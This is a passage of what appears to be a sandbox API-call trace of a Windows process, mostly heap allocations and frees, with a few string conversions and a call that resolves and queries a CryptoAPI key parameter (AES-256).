hHeap=0x1780000) returned 1 [0077.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0077.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2720 [0077.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0077.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0077.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0077.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca688 [0077.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0077.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0077.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0077.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0077.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0077.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0077.821] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0077.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0077.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0077.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0077.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0077.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0077.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0077.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0077.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0077.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0077.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0077.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0077.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0077.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ec8 [0077.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0077.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0077.822] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0077.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0077.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0077.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0077.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0077.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0077.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0077.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0077.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0077.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0077.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0077.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0077.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0077.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0077.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0077.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0077.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0077.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0077.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0077.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0077.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0077.823] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0077.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0077.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0077.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0077.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0077.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0077.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0077.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0077.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0077.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0077.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0077.823] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0077.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6b8 [0077.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0077.823] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0077.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0077.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0077.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0077.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0077.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0077.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0077.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0077.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0077.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0077.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0077.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0077.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0077.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0077.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0077.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0077.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0077.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0077.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0077.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0077.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0077.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0077.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0077.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0077.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0077.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0077.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0077.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0077.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0077.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e48 [0077.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0077.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0077.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0077.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0077.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0077.825] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0077.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0077.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0077.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0077.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0077.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0077.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0077.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0077.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0077.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0077.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0077.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0077.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0077.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0077.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.826] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0077.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0077.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0077.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0077.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0077.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0077.826] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0077.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0077.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0077.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0077.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0077.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0077.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0077.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0077.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0077.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0077.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0077.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0077.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0077.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0077.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0077.828] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0077.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0077.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0077.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0077.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0077.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0077.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0077.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0077.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0077.828] CryptGetKeyParam (in: hKey=0x41ac2c0, dwParam=0x7, pbData=0x43e2670, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2670*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0077.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0077.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0077.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0077.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0077.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0077.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0077.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0077.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0077.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0077.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0077.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0077.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0077.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0077.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0077.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0077.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0077.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0077.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0077.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0077.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0077.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0077.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0077.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0077.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0077.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0077.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0077.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0077.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0077.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0077.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0077.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0077.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0077.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0077.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0077.829] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0077.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0077.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0077.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0077.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0077.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0077.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0077.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0077.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0077.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0077.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0077.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0077.830] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0077.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0077.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0077.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.830] HeapFree (in: 